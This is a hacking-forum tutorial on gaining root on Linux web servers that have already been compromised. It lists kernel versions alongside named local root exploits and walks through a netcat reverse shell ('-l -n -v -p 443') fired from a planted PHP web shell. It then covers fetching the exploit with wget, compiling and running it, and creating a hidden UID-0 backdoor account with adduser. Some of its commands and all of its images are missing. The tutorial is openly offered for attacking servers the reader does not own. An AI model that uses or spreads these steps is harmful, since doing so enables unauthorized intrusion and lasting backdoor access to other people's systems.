Skip to main content

Rooting Tutorial and Adding New Root User

Hello all and welcome to a tutorial on how to root a linux server.
This is going to be short,HQ tutorial with pictures included (For better learining)

So let's start with things you will need:

1) Shelled website
2) Local root exploit
3) NetCat

Chapter 1 - Gathering informations

Open up your .php shell on a hacked webserver.
I have mine for an example

Now you need to check what kernel your slave is using...
It should be something like

Linux 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686

Next thing you wanna do is to look for an local root exploit.
From example provided mine one is 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686.

Here's the list of exploits

2.2 ->  ptrace
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
2.6.23 - 2.6.24 -> diane_lane_******_hard.c
2.6.17 - 2.6.24-1 -> jessica_biel_naked_in_my_bed.c

Now when you confirmed your exploit it's time to find it...
Google is your best friend and this site here... It does have many exploits.

NOTE: If your webserver have 2.6.18 2011 kernel,then you have 0.0001% chances that you will root it,because there's no public exploit for that version.

Chapter 2 - Backconnecting to the server

For this you will need:

1) NetCat
2) Open port (Example. 443 I won't teach how to port forward,use Google if you don't know how!!)

So open your netcat and type:

-l -n -v -p 443

Hit "Enter"

Now it should write "listening on [any] 443 ..."
Go back to your shell and go to "BackConnect function"
Many shells have it.
Enter your port and press "Connect".

[Image: 23cSqoxuW7FY3MO-Region.png]

Now it should connect to your netcat
I got something like this:

[Image: FuV6epg7POchdxV-CWINDOWSsystem32.png]

Chapter 3 - Downloading exploit and executing it

Now we will need our exploit from Chapter 1
There's 2 way of uploading:

1) Using shell uploader
2) Using 'wget' function (Requires backconnection)

I'm going to use 'wget' function because it's easier and faster.
So copy your exploit link (Mine one and go back to your netcat and type:


Now it downloaded out exploit named "" on our server.

If your exploit is downloaded as anyrandomname.c you must compile it
Do do that first download that exploit and then type:

gcc anyrandomname.c -o anyrandomname

And our exploit is compiled. (If you get errors when compiling then find another exploit)

[Image: vjUt4DhVknKljlm-CWINDOWSsystem32.png]

If you downloaded your exploit in zip file type:


[Image: XgNQSgGHdRXyIN5-CWINDOWSsystem32.png]

Now you should have your exploit (Like mine "2.6.18-164")

If you completed all steps it's time to get root.


chmod 777 yourexploit'sname

With common sense where i typed "yourexploit'sname" you will type your exploit's name.

And one last final step is to run our exploit


To check if you got root type




Mine steps to root

[Image: 1nOr845qTNAPEn3-CWINDOWSsystem32.png]

Chapter 4 - Adding root user

Adding new root user is fairly easy
We use this command:

adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M root2

Command explanations:

Quote:adduser - Using Linux adduser command to create a new user account or to update default new user information.

-u 0 -o - Set the value of user id to 0.

-g 0 - Set the initial group number or name to 0

-G 0,1,2,3,4,6,10 - Set supplementary group to:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel

-M - 'home directory' not created for the user.

root2 - User name of the new user account.

NOTE: Change root2 to your desired username.

Now you need to set a password for your username.
Type in next:

passwd Root2

(Root2 is your username)

See an example

[root@fedora ~]# passwd root2
Changing password for user root2.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.

To check if you did alright

id root2

(Root2 is your username)

[Image: LEoszc56WjqoepL-CWINDOWSsystem32.png]

All programs/sites i used:

GNY shell -
Google -
NetCat -

So that concluded our rooting tutorial.
I hope that someone will learn from this and that this thread will be bookmarked for generations Biggrin